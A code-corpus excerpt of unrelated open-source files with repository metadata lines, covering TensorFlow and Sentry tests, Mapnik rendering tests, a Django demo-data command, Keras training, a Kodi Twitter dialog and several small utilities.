stepper.intermediate_tensor_names())
self.assertAllClose(2.0, stepper.get_tensor_value("a/read:0"))
self.assertAllClose(3.0, stepper.get_tensor_value("b/read:0"))
self.assertAllClose(4.0, stepper.get_tensor_value("d:0"))
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_HANDLE,
"a/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
def testUsingNodesNotUsingIntermediateTensors(self):
with NodeStepper(self.sess, self.e) as stepper:
# There should be no handles before any cont() calls.
self.assertEqual([], stepper.handle_names())
self.assertSetEqual(set(), stepper.handle_node_names())
# Before the cont() call, the stepper should not have access to the value
# of c:0.
with self.assertRaisesRegexp(
ValueError,
"This stepper instance does not have access to the value of tensor "
"\"c:0\""):
stepper.get_tensor_value("c:0")
# Using the node/tensor itself, instead of the name str, should work on
# cont().
result = stepper.cont(self.c)
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(6.0, result)
self.assertEqual({}, stepper.last_feed_types())
self.assertEqual(["c:0"], stepper.handle_names())
self.assertEqual({"c"}, stepper.handle_node_names())
# After the cont() call, the stepper should have access to the value of
# c:0 via a tensor handle.
self.assertAllClose(6.0, stepper.get_tensor_value("c:0"))
result = stepper.cont(self.e)
self.assertAllClose(24.0, result)
self.assertItemsEqual(["a/read:0", "b/read:0", "d:0"],
stepper.intermediate_tensor_names())
self.assertEqual({
"c:0": NodeStepper.FEED_TYPE_HANDLE,
"a/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
def testContToTensorWithIntermediateDumpShouldUseDump(self):
with NodeStepper(self.sess, ["e:0", "f:0"]) as stepper:
stepper.cont("c:0")
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(2.0, stepper.get_tensor_value("a/read:0"))
self.assertAllClose(3.0, stepper.get_tensor_value("b/read:0"))
self.assertAllClose(2.0, stepper.cont("a/read:0"))
self.assertEqual({
"a/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE
}, stepper.last_feed_types())
self.assertAllClose(10.0, stepper.cont("f:0"))
self.assertEqual({
"b/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE
}, stepper.last_feed_types())
def testDisablingUseDumpedIntermediatesWorks(self):
with NodeStepper(self.sess, ["e:0", "f:0"]) as stepper:
stepper.cont("c:0")
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(2.0, stepper.get_tensor_value("a/read:0"))
self.assertAllClose(3.0, stepper.get_tensor_value("b/read:0"))
self.assertAllClose(10.0,
stepper.cont("f:0", use_dumped_intermediates=False))
self.assertEqual({}, stepper.last_feed_types())
def testIsFeedableShouldGiveCorrectAnswers(self):
with NodeStepper(self.sess, self.e) as stepper:
self.assertTrue(stepper.is_feedable("a/read:0"))
self.assertTrue(stepper.is_feedable("b/read:0"))
self.assertTrue(stepper.is_feedable("c:0"))
self.assertTrue(stepper.is_feedable("d:0"))
def testOverrideValue(self):
with NodeStepper(self
|
ychab/privagal
|
privagal/core/management/commands/genfactories.py
|
Python
|
bsd-3-clause
| 1,893
| 0
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import random
from django.conf import settings
from django.core.management.base import BaseCommand
from wagtail.wagtailcore.models import Page
from wagtail.wagtailimages.models import get_image_model
from privagal.gallery.factories import GalleryFactory, ImageFactory
from privagal.gallery.models import Gallery
from privagal.timeline.models import Timeline
ASSETS_PATH = os.path.join(settings.PROJECT_DIR, 'core', 'tests', 'assets')
IMAGES = [
'django.png',
'django-pony.png',
'django-pony-pink.jpg',
'wagtail.png',
'wagtail-space.png',
'python.jpg',
]
Image = get_image_model()
class Command(BaseCommand):
help = 'Generate some data for a demo purpose.'
leave_locale_alone = True
def add_arguments(self, parser):
parser.add_argument('--limit', action='store', type=int, default=5,
help="How many galleries to generate")
parser.add_argument('--purge', action='store_true', default=False,
help="Whether to delete all previous galleries "
"before creating new ones.")
def handle(self, *args, **options):
if options.get('purge'):
Page.objects.type(Gallery).delete()
            Image.objects.all().delete()
images = []
for image in IMAGES:
images.append(
                ImageFactory(file__from_path=os.path.join(ASSETS_PATH, image)))
timeline = Timeline.objects.last()
for i in range(0, options['limit']):
random.shuffle(images)
gallery = GalleryFactory(images__images=images)
timeline.add_child(instance=gallery)
self.stdout.write(
'Galleries have been generated successfully.',
style_func=self.style.MIGRATE_SUCCESS,
)
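# --- Usage sketch (assumption: standard Django management-command layout) ----
# Because this module lives under .../management/commands/, it is invoked via
# manage.py; --limit and --purge map to the options defined in add_arguments():
#
#   python manage.py genfactories --limit 10 --purge
#
# A programmatic equivalent using Django's call_command:
#   from django.core.management import call_command
#   call_command('genfactories', limit=10, purge=True)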
|
amoshyc/tthl-code
|
train_resnet.py
|
Python
|
apache-2.0
| 1,324
| 0.005287
|
import json
from datetime import datetime
import numpy as np
import pandas as pd
import tensorflow as tf
from keras.backend.tensorflow_backend import set_session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
set_session(tf.Session(config=config))
from keras.models import Sequential, Model
from keras.preprocessing import image
from keras.layers import *
from keras.optimizers import *
from keras.applications.resnet50 import ResNet50
from keras.callbacks import ModelCheckpoint, CSVLogger
from myutils import get_callbacks
inp = Input(shape=(224, 224, 3))
x = BatchNormalization()(inp)
x = ResNet50(weights='imagenet', include_top=False, pooling='max')(x)
x = Dense(16, activation='relu')(x)
x = Dropout(0.5)(x)
x = Dense(1, activation='sigmoid')(x)
model = Model(inputs=inp, outputs=x)
model_arg = {
'loss': 'binary_crossentropy',
'optimizer': 'sgd',
'metrics': ['binary_accuracy']
}
model.compile(**model_arg)
model.summary()
train = np.load('npz/train.npz')
x_train, y_train = train['xs'], train['ys']
val = np.load('npz/val.npz')
x_val, y_val = val['xs'], val['ys']
fit_arg = {
'x': x_train,
'y': y_train,
'batch_size': 40,
'epochs': 50,
'shuffle': True,
'validation_data': (x_val, y_val),
'callbacks': get_callbacks('resnet'),
}
model.fit(**fit_arg)
|
mitsuhiko/sentry
|
tests/sentry/api/endpoints/test_shared_group_details.py
|
Python
|
bsd-3-clause
| 1,141
| 0.000876
|
from __future__ import absolute_import, print_function
from sentry.testutils import APITestCase
class SharedGroupDetailsTest(APITestCase):
def test_simple(self):
self.login_as(user=self.user)
group = self.create_group()
event = self.create_event(group=group)
url = '/api/0/shared/issues/{}/'.format(group.get_share_id())
response = self.client.get(url, format='json')
assert response.status_code == 200, response.content
assert response.data['id'] == str(group.id)
assert response.data['latestEvent']['id'] == str(event.id)
|
assert response.data['project']['slug'] == group.project.slug
assert response.data['project']['organization']['slug'] == group.organization.slug
def test_feature_disabled(self):
self.login_as(user=self.user)
group = self.create_group()
org = group.organization
        org.flags.disable_shared_issues = True
org.save()
url = '/api/0/shared/issues/{}/'.format(group.get_share_id())
response = self.client.get(url, format='json')
assert response.status_code == 404
|
manz/python-mapnik
|
test/python_tests/cairo_test.py
|
Python
|
lgpl-2.1
| 8,571
| 0.015634
|
#!/usr/bin/env python
from __future__ import print_function
import os
import shutil
import mapnik
from nose.tools import eq_
from .utilities import execution_path, run_all
def setup():
# All of the paths used are relative, if we run the tests
# from another directory we need to chdir()
os.chdir(execution_path('.'))
def make_tmp_map():
m = mapnik.Map(512,512)
m.background_color = mapnik.Color('steelblue')
ds = mapnik.MemoryDatasource()
context = mapnik.Context()
context.push('Name')
f = mapnik.Feature(context,1)
f['Name'] = 'Hello'
f.geometry = mapnik.Geometry.from_wkt('POINT (0 0)')
ds.add_feature(f)
s = mapnik.Style()
r = mapnik.Rule()
sym = mapnik.MarkersSymbolizer()
sym.allow_overlap = True
r.symbols.append(sym)
s.rules.append(r)
lyr = mapnik.Layer('Layer')
lyr.datasource = ds
lyr.styles.append('style')
m.append_style('style',s)
m.layers.append(lyr)
return m
def draw_title(m,ctx,text,size=10,color=mapnik.Color('black')):
    """ Draw a Map Title near the top of a page."""
middle = m.width/2.0
    ctx.set_source_rgba(*cairo_color(color))
ctx.select_font_face("DejaVu Sans Book", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL)
ctx.set_font_size(size)
x_bearing, y_bearing, width, height = ctx.text_extents(text)[:4]
ctx.move_to(middle - width / 2 - x_bearing, 20.0 - height / 2 - y_bearing)
ctx.show_text(text)
def draw_neatline(m,ctx):
w,h = m.width, m.height
ctx.set_source_rgba(*cairo_color(mapnik.Color('black')))
outline = [
[0,0],[w,0],[w,h],[0,h]
]
ctx.set_line_width(1)
for idx,pt in enumerate(outline):
if (idx == 0):
ctx.move_to(*pt)
else:
ctx.line_to(*pt)
ctx.close_path()
inset = 6
inline = [
[inset,inset],[w-inset,inset],[w-inset,h-inset],[inset,h-inset]
]
ctx.set_line_width(inset/2)
for idx,pt in enumerate(inline):
if (idx == 0):
ctx.move_to(*pt)
else:
ctx.line_to(*pt)
ctx.close_path()
ctx.stroke()
def cairo_color(c):
""" Return a Cairo color tuple from a Mapnik Color."""
ctx_c = (c.r/255.0,c.g/255.0,c.b/255.0,c.a/255.0)
return ctx_c
if mapnik.has_pycairo():
import cairo
def test_passing_pycairo_context_svg():
m = make_tmp_map()
m.zoom_to_box(mapnik.Box2d(-180,-90,180,90))
test_cairo_file = '/tmp/mapnik-cairo-context-test.svg'
surface = cairo.SVGSurface(test_cairo_file, m.width, m.height)
expected_cairo_file = './images/pycairo/cairo-cairo-expected.svg'
context = cairo.Context(surface)
mapnik.render(m,context)
draw_title(m,context,"Hello Map",size=20)
draw_neatline(m,context)
surface.finish()
if not os.path.exists(expected_cairo_file) or os.environ.get('UPDATE'):
print('generated expected cairo surface file %s' % expected_cairo_file)
shutil.copy(test_cairo_file,expected_cairo_file)
diff = abs(os.stat(expected_cairo_file).st_size-os.stat(test_cairo_file).st_size)
msg = 'diff in size (%s) between actual (%s) and expected(%s)' % (diff,test_cairo_file,'tests/python_tests/'+ expected_cairo_file)
eq_( diff < 1500, True, msg)
os.remove(test_cairo_file)
def test_passing_pycairo_context_pdf():
m = make_tmp_map()
m.zoom_to_box(mapnik.Box2d(-180,-90,180,90))
test_cairo_file = '/tmp/mapnik-cairo-context-test.pdf'
surface = cairo.PDFSurface(test_cairo_file, m.width, m.height)
expected_cairo_file = './images/pycairo/cairo-cairo-expected.pdf'
context = cairo.Context(surface)
mapnik.render(m,context)
draw_title(m,context,"Hello Map",size=20)
draw_neatline(m,context)
surface.finish()
if not os.path.exists(expected_cairo_file) or os.environ.get('UPDATE'):
print('generated expected cairo surface file %s' % expected_cairo_file)
shutil.copy(test_cairo_file,expected_cairo_file)
diff = abs(os.stat(expected_cairo_file).st_size-os.stat(test_cairo_file).st_size)
msg = 'diff in size (%s) between actual (%s) and expected(%s)' % (diff,test_cairo_file,'tests/python_tests/'+ expected_cairo_file)
eq_( diff < 1500, True, msg)
os.remove(test_cairo_file)
def test_passing_pycairo_context_png():
m = make_tmp_map()
m.zoom_to_box(mapnik.Box2d(-180,-90,180,90))
test_cairo_file = '/tmp/mapnik-cairo-context-test.png'
surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, m.width, m.height)
expected_cairo_file = './images/pycairo/cairo-cairo-expected.png'
expected_cairo_file2 = './images/pycairo/cairo-cairo-expected-reduced.png'
context = cairo.Context(surface)
mapnik.render(m,context)
draw_title(m,context,"Hello Map",size=20)
draw_neatline(m,context)
surface.write_to_png(test_cairo_file)
reduced_color_image = test_cairo_file.replace('png','-mapnik.png')
im = mapnik.Image.from_cairo(surface)
im.save(reduced_color_image,'png8')
surface.finish()
if not os.path.exists(expected_cairo_file) or os.environ.get('UPDATE'):
print('generated expected cairo surface file %s' % expected_cairo_file)
shutil.copy(test_cairo_file,expected_cairo_file)
diff = abs(os.stat(expected_cairo_file).st_size-os.stat(test_cairo_file).st_size)
msg = 'diff in size (%s) between actual (%s) and expected(%s)' % (diff,test_cairo_file,'tests/python_tests/'+ expected_cairo_file)
eq_( diff < 500, True, msg)
os.remove(test_cairo_file)
if not os.path.exists(expected_cairo_file2) or os.environ.get('UPDATE'):
print('generated expected cairo surface file %s' % expected_cairo_file2)
shutil.copy(reduced_color_image,expected_cairo_file2)
diff = abs(os.stat(expected_cairo_file2).st_size-os.stat(reduced_color_image).st_size)
msg = 'diff in size (%s) between actual (%s) and expected(%s)' % (diff,reduced_color_image,'tests/python_tests/'+ expected_cairo_file2)
eq_( diff < 500, True, msg)
os.remove(reduced_color_image)
if 'sqlite' in mapnik.DatasourceCache.plugin_names():
def _pycairo_surface(type,sym):
test_cairo_file = '/tmp/mapnik-cairo-surface-test.%s.%s' % (sym,type)
expected_cairo_file = './images/pycairo/cairo-surface-expected.%s.%s' % (sym,type)
m = mapnik.Map(256,256)
mapnik.load_map(m,'../data/good_maps/%s_symbolizer.xml' % sym)
m.zoom_all()
if hasattr(cairo,'%sSurface' % type.upper()):
surface = getattr(cairo,'%sSurface' % type.upper())(test_cairo_file, m.width,m.height)
mapnik.render(m, surface)
surface.finish()
if not os.path.exists(expected_cairo_file) or os.environ.get('UPDATE'):
print('generated expected cairo surface file %s' % expected_cairo_file)
shutil.copy(test_cairo_file,expected_cairo_file)
diff = abs(os.stat(expected_cairo_file).st_size-os.stat(test_cairo_file).st_size)
msg = 'diff in size (%s) between actual (%s) and expected(%s)' % (diff,test_cairo_file,'tests/python_tests/'+ expected_cairo_file)
if os.uname()[0] == 'Darwin':
eq_( diff < 2100, True, msg)
else:
eq_( diff < 23000, True, msg)
os.remove(test_cairo_file)
return True
else:
print('skipping cairo.%s test since surface is not available' % type.upper())
return True
def test_pycairo_svg_surface1():
eq_(_pycairo_surface('svg','point'),True)
def test_pycairo_svg_surface2():
eq_(_pycairo_surface('svg','building'),True)
def test_pycairo_svg_surface3():
eq_(_pycairo_surface('svg','polygon'),True)
|
Zymo-Research/mirror-seq
|
setup.py
|
Python
|
apache-2.0
| 939
| 0.017039
|
from setuptools import setup
exec(open('mirror_seq/version.py').read())
LONG_DESCRIPTION = '''
Please visit the GitHub repo (https://github.com/Zymo-Research/mirror-seq) for detail information.
'''
INSTALL_REQUIRES = [
'pandas>=0.18.0',
'pysam>=0.9.0',
'cutadapt==1.9.1',
]
setup(name='mirror_seq',
version=__version__,
description='The bioinformatics tool for Mirror-seq.',
long_description=LONG_DESCRIPTION,
url='https://github.com/Zymo-Research/mirror-seq',
      author='Hunter Chung',
author_email='b89603112@gmail.com',
      license='Apache License 2.0',
scripts=['bin/mirror-seq', 'bin/mirror-trim', 'bin/mirror-call'],
packages=['mirror_seq'],
test_suite='nose.collector',
tests_require=['nose'],
install_requires=INSTALL_REQUIRES,
classifiers=['Programming Language :: Python :: 2.7'],
keywords='mirror sequencing next-gen hydroxymethylation bisulfite bioinformatics')
|
CalvinHsu1223/LinuxCNC-EtherCAT-HAL-Driver
|
configs/sim/remap/manual-toolchange-with-tool-length-switch/python/gladevcp-handler.py
|
Python
|
gpl-2.0
| 801
| 0.014981
|
#!/usr/bin/env python
import hal
class HandlerClass:
def on_led_change(self,hal_led,data=None):
'''
the gladevcp.change led had a transition
'''
if hal_led.hal_pin.get():
if self.halcomp["number"] > 0.0:
self.change_text.set_label("Insert too number %d" % (int(self.halcomp["number"])))
else:
self.change_text.set_label("Remove tool")
else:
self.change_text.set_label("")
def __init__(self, halcomp,builder,useropts):
self.halcomp = halcomp
self.change_text = builder.get_object("change-text")
        self.halcomp.newpin("number", hal.HAL_FLOAT, hal.HAL_IN)
def get_handlers(halcomp,builder,useropts):
return [HandlerClass(halcomp,builder,useropts)]
|
googleapis/python-dialogflow-cx
|
samples/generated_samples/dialogflow_v3_generated_flows_validate_flow_sync.py
|
Python
|
apache-2.0
| 1,436
| 0.000696
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for ValidateFlow
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dialogflowcx
# [START dialogflow_v3_generated_Flows_ValidateFlow_sync]
from google.cloud import dialogflowcx_v3
def sample_validate_flow():
# Create a client
client = dialogflowcx_v3.FlowsClient()
# Initialize request argument(s)
request = dialogflowcx_v3.ValidateFlowRequest(
name="name_value",
)
# Make the request
response = client.validate_flow(request=request)
# Handle the response
print(response)
# [END dialogflow_v3_generated_Flows_ValidateFlow_sync]
|
trosa/forca
|
scripts/cleanhtml.py
|
Python
|
gpl-2.0
| 2,334
| 0.065981
|
import sys
import re
def cleancss(text):
text=re.compile('\s+').sub(' ', text)
text=re.compile('\s*(?P<a>,|:)\s*').sub('\g<a> ', text)
text=re.compile('\s*;\s*').sub(';\n ', text)
text=re.compile('\s*\{\s*').sub(' {\n ', text)
text=re.compile('\s*\}\s*').sub('\n}\n\n', text)
return text
def cleanhtml(text):
text=text.lower()
r=re.compile('\<script.+?/script\>', re.DOTALL)
scripts=r.findall(text)
text=r.sub('<script />', text)
r=re.compile('\<style.+?/style\>', re.DOTALL)
styles=r.findall(text)
text=r.sub('<style />', text)
text=re.compile(
'<(?P<tag>(input|meta|link|hr|br|img|param))(?P<any>[^\>]*)\s*(?<!/)>')\
.sub('<\g<tag>\g<any> />', text)
text=text.replace('\n', ' ')
text=text.replace('>', '>\n')
text=text.replace('<', '\n<')
text=re.compile('\s*\n\s*').sub('\n', text)
lines=text.split('\n')
(indent, newlines)=(0, [])
for line in lines:
if line[:2]=='</': indent=indent-1
newlines.append(indent*' '+line)
if not line[:2]=='</' and line[-1:]=='>' and \
not line[-2:] in ['/>', '->']: indent=indent+1
text='\n'.join(newlines)
text=re.compile('\<div(?P<a>( .+)?)\>\s+\</div\>').sub('<div\g<a>></div>',text)
text=re.compile('\<a(?P<a>( .+)?)\>\s+(?P<b>[\w\s\(\)\/]+?)\s+\</a\>').sub('<a\g<a>>\g<b></a>',text)
text=re.compile('\<b(?P<a>( .+)?)\>\s+(?P<b>[\w\s\(\)\/]+?)\s+\</b\>').sub('<b\g<a>>\g<b></b>',text)
text=re.compile('\<i(?P<a>( .+)?)\>\s+(?P<b>[\w\s\(\)\/]+?)\s+\</i\>').sub('<i\g<a>>\g<b></i>',text)
text=re.compile('\<span(?P<a>( .+)?)\>\s+(?P<b>[\w\s\(\)\/]+?)\s+\</span\>').sub('<span\g<a>>\g<b></span>',text)
    text=re.compile('\s+\<br(?P<a>.*?)\/\>').sub('<br\g<a>/>',text)
text=re.compile('\>(?P<a>\s+)(?P<b>[\.\,\:\;])').sub('>\g<b>\g<a>',text)
    text=re.compile('\n\s*\n').sub('\n',text)
for script in scripts:
text=text.replace('<script />', script, 1)
for style in styles:
text=text.replace('<style />', cleancss(style), 1)
return text
def read_file(filename):
f = open(filename, 'r')
try:
return f.read()
finally:
f.close()
file=sys.argv[1]
if file[-4:]=='.css':
print cleancss(read_file(file))
if file[-5:]=='.html':
print cleanhtml(read_file(file))
|
idl3r/Ropper
|
ropperapp/loaders/pe_intern/__init__.py
|
Python
|
gpl-2.0
| 729
| 0
|
#!/usr/bin/env python2
# coding=utf-8
#
# Copyright 2014 Sascha Schirra
#
# This file is part of Ropper.
#
# Ropper is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ropper is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
yuxiang-zhou/menpo
|
menpo/model/vectorizable.py
|
Python
|
bsd-3-clause
| 6,200
| 0.000484
|
class VectorizableBackedModel(object):
r"""
Mixin for models constructed from a set of :map:`Vectorizable` objects.
Supports models for which visualizing the meaning of a set of components
is trivial.
Requires that the following methods are implemented:
1. `component_vector(index)`
2. `instance_vector(weights)`
3. `project_vector(vector)`
4. `reconstruct_vector(vectors)`
5. `project_out_vector(vector)`
The constructor takes an instance of :map:`Vectorizable`. This is used for
all conversions to and from numpy vectors and instances.
Parameters
----------
template_instance : :map:`Vectorizable`
The template instance.
"""
def __init__(self, template_instance):
self.template_instance = template_instance
def component_vector(self, index):
r"""
A particular component of the model, in vectorized form.
Parameters
----------
index : `int`
The component that is to be returned.
Returns
-------
component_vector : `ndarray`
The component vector.
"""
raise NotImplementedError()
def component(self, index):
r"""
A particular component of the model.
Parameters
----------
index : `int`
The component that is to be returned.
Returns
-------
component : `type(self.template_instance)`
The component instance.
"""
return self.template_instance.from_vector(self.component_vector(index))
def instance_vector(self, weights):
"""
Creates a new vector instance of the model using the first ``len(weights)``
components.
Parameters
----------
weights : ``(n_weights,)`` `ndarray` or `list`
``weights[i]`` is the linear contribution of the i'th component
to the instance vector.
Raises
------
ValueError
If n_weights > n_components
Returns
-------
instance_vector : `ndarray`
An instance of the model, in vectorized form.
"""
raise NotImplementedError()
def instance(self, weights):
"""
Creates a new instance of the model using the first ``len(weights)``
components.
Parameters
----------
weights : ``(n_weights,)`` `ndarray` or `list`
``weights[i]`` is the linear contribution of the i'th component
to the instance vector.
Raises
------
ValueError
If n_weights > n_components
Returns
-------
instance : `type(self.template_instance)`
An instance of the model.
"""
return self.template_instance.from_vector(
self.instance_vector(weights))
def project_vector(self, instance_vector):
"""
Projects the `instance_vector` onto the model, retrieving the optimal
linear weightings.
Parameters
----------
instance_vector : `ndarray`
A novel instance vector.
Returns
-------
projected_vector : ``(n_components,)`` `ndarray`
A vector of optimal linear weightings.
"""
raise NotImplementedError()
def project(self, instance):
"""
Projects the `instance` onto the model, retrieving the optimal
linear weightings.
        Parameters
----------
instance : :map:`Vectorizable`
A novel instance.
Returns
-------
projected : ``(n_components,)`` `ndarray`
A vector of optimal linear weightings.
"""
        return self.project_vector(instance.as_vector())
def reconstruct_vector(self, instance_vector):
"""
Projects an `instance_vector` onto the linear space and rebuilds from the
weights found.
Syntactic sugar for: ::
instance_vector(project_vector(instance_vector))
but faster, as it avoids the conversion that takes place each time.
Parameters
----------
instance_vector : `ndarray`
A novel instance vector.
Returns
-------
reconstructed_vector : `ndarray`
The reconstructed vector.
"""
raise NotImplementedError()
def reconstruct(self, instance):
"""
Projects a `instance` onto the linear space and rebuilds from the
weights found.
Syntactic sugar for: ::
instance(project(instance))
but faster, as it avoids the conversion that takes place each time.
Parameters
----------
instance : :class:`Vectorizable`
A novel instance of :class:`Vectorizable`.
Returns
-------
reconstructed : `self.instance_class`
The reconstructed object.
"""
reconstruction_vector = self.reconstruct_vector(instance.as_vector())
return instance.from_vector(reconstruction_vector)
def project_out_vector(self, instance_vector):
"""
Returns a version of `instance_vector` where all the basis of the model
have been projected out.
Parameters
----------
instance_vector : `ndarray`
A novel instance vector.
Returns
-------
projected_out_vector : `ndarray`
A copy of `instance_vector`, with all bases of the model projected out.
"""
raise NotImplementedError()
def project_out(self, instance):
"""
Returns a version of `instance` where all the basis of the model
have been projected out.
Parameters
----------
instance : :class:`Vectorizable`
A novel instance of :class:`Vectorizable`.
Returns
-------
projected_out : `self.instance_class`
A copy of `instance`, with all basis of the model projected out.
"""
vector_instance = self.project_out_vector(instance.as_vector())
return instance.from_vector(vector_instance)
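# --- Minimal subclass sketch (illustration only; every name below is hypothetical) ---
# A toy model backed by a plain numpy component matrix, showing which of the
# five *_vector hooks a concrete subclass is expected to implement.
import numpy as np

class _DemoVectorModel(VectorizableBackedModel):
    def __init__(self, template_instance, components):
        super(_DemoVectorModel, self).__init__(template_instance)
        # components has shape (n_components, n_features)
        self._components = np.asarray(components)

    def component_vector(self, index):
        return self._components[index]

    def instance_vector(self, weights):
        weights = np.asarray(weights)
        return weights.dot(self._components[:len(weights)])

    def project_vector(self, instance_vector):
        # Least-squares weights of the vector on the component basis.
        return np.linalg.lstsq(self._components.T, instance_vector, rcond=None)[0]

    def reconstruct_vector(self, instance_vector):
        return self.instance_vector(self.project_vector(instance_vector))

    def project_out_vector(self, instance_vector):
        return instance_vector - self.reconstruct_vector(instance_vector)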
|
erwindl0/python-rpc
|
org.eclipse.triquetrum.python.service/scripts/scisoftpy/python/pycomparisons.py
|
Python
|
epl-1.0
| 1,127
| 0.008873
|
###
# Copyright 2011 Diamond Light Source Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
'''
Comparisons package
'''
import numpy as _np #@UnresolvedImport
all = _np.all #@ReservedAssignment
any = _np.any #@ReservedAssignment
greater = _np.greater
greater_equal = _np.greater_equal
less = _np.less
less_equal = _np.less_equal
equal = _np.equal
not_equal = _np.not_equal
logical_not = _np.logical_not
logical_and = _np.logical_and
logical_or = _np.logical_or
logical_xor = _np.logical_xor
allclose = _np.allclose
nonzero = _np.nonzero
where = _np.where
iscomplex = _np.iscomplex
isreal = _np.isreal
|
enen92/script.matchcenter
|
resources/lib/tweets.py
|
Python
|
gpl-2.0
| 4,506
| 0.025522
|
# -*- coding: utf-8 -*-
'''
script.matchcenter - Football information for Kodi
A program addon that can be mapped to a key on your remote to display football information.
Livescores, Event details, Line-ups, League tables, next and previous matches by team. Follow what
others are saying about the match in twitter.
Copyright (C) 2016 enen92
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import xbmcgui
import xbmc
import datetime
import json
import mainmenu
import os
from resources.lib.utilities import tweet
from resources.lib.utilities.addonfileio import FileIO
from resources.lib.utilities import ssutils
from resources.lib.utilities.common_addon import *
class TwitterDialog(xbmcgui.WindowXMLDialog):
def __init__( self, *args, **kwargs ):
self.isRunning = True
self.hash = kwargs["hash"]
self.standalone = kwargs["standalone"]
self.teamObjs = {}
def onInit(self):
xbmc.log(msg="[Match Center] Twitter cycle started", level=xbmc.LOGDEBUG)
self.getControl(32540).setImage(os.path.join(addon_path,"resources","img","goal.png"))
        xbmc.executebuiltin("SetProperty(loading-script-matchcenter-twitter,1,home)")
self.getTweets()
xbmc.executebuiltin("ClearProperty(loading-script-matchcenter-twitter,Home)")
i=0
while self.isRunning:
if (float(i*200)/(twitter_update_time*60*1000)).is_integer() and ((i*200)/(3*60*1000)) != 0:
self.getTweets()
xbmc.sleep(200)
i += 1
xbmc.log(msg="[Match Center] Twitter cycle stopped", level=xbmc.LOGDEBUG)
def getTweets(self):
        self.getControl(32500).setLabel("#"+self.hash)
self.getControl(32503).setImage(os.path.join(addon_path,"resources","img","twitter_sm.png"))
tweetitems = []
tweets = tweet.get_hashtag_tweets(self.hash)
if tweets:
for _tweet in tweets:
td = ssutils.get_timedelta_string(datetime.datetime.utcnow() - _tweet["date"])
item = xbmcgui.ListItem(_tweet["text"].replace("\n",""))
item.setProperty("profilepic",_tweet["profilepic"])
item.setProperty("author","[B]" +"@" + _tweet["author"] + "[/B]")
item.setProperty("timedelta", td)
tweetitems.append(item)
self.getControl(32501).reset()
self.getControl(32501).addItems(tweetitems)
if tweetitems:
self.setFocusId(32501)
return
def reset(self):
if os.path.exists(tweet_file):
os.remove(tweet_file)
xbmcgui.Dialog().ok(translate(32000), translate(32045))
return
def stopRunning(self):
self.isRunning = False
self.close()
if not self.standalone:
mainmenu.start()
def onAction(self,action):
if action.getId() == 92 or action.getId() == 10:
self.stopRunning()
def onClick(self,controlId):
if controlId == 32501:
teamid = self.getControl(controlId).getSelectedItem().getProperty("teamid")
matchhistory.start(teamid)
elif controlId == 32514:
self.reset()
def start(twitterhash=None, standalone=False):
if not twitterhash:
userInput = True
if os.path.exists(tweet_file):
twitter_data = json.loads(FileIO.fileread(tweet_file))
twitterhash = twitter_data["hash"]
twitter_mediafile = twitter_data["file"]
if twitter_mediafile == xbmc.getInfoLabel('Player.Filenameandpath'):
userInput = False
else:
userInput = False
if userInput:
dialog = xbmcgui.Dialog()
twitterhash = dialog.input(translate(32046), type=xbmcgui.INPUT_ALPHANUM)
if len(twitterhash) != 0:
twitterhash = twitterhash.replace("#","")
else:
xbmcgui.Dialog().ok(translate(32000), translate(32047))
mainmenu.start()
if twitterhash:
#Save twitter hashtag
if twitter_history_enabled == 'true':
tweet.add_hashtag_to_twitter_history(twitterhash)
if xbmc.getCondVisibility("Player.HasMedia") and save_hashes_during_playback == 'true':
tweet.savecurrenthash(twitterhash)
main = TwitterDialog('script-matchcenter-Twitter.xml', addon_path, getskinfolder(), '', hash=twitterhash, standalone=standalone)
main.doModal()
del main
|
izapolsk/integration_tests
|
cfme/tests/cloud_infra_common/test_events.py
|
Python
|
gpl-2.0
| 3,523
| 0.001419
|
"""This module tests events that are invoked by Cloud/Infra VMs."""
import fauxfactory
import pytest
from cfme import test_requirements
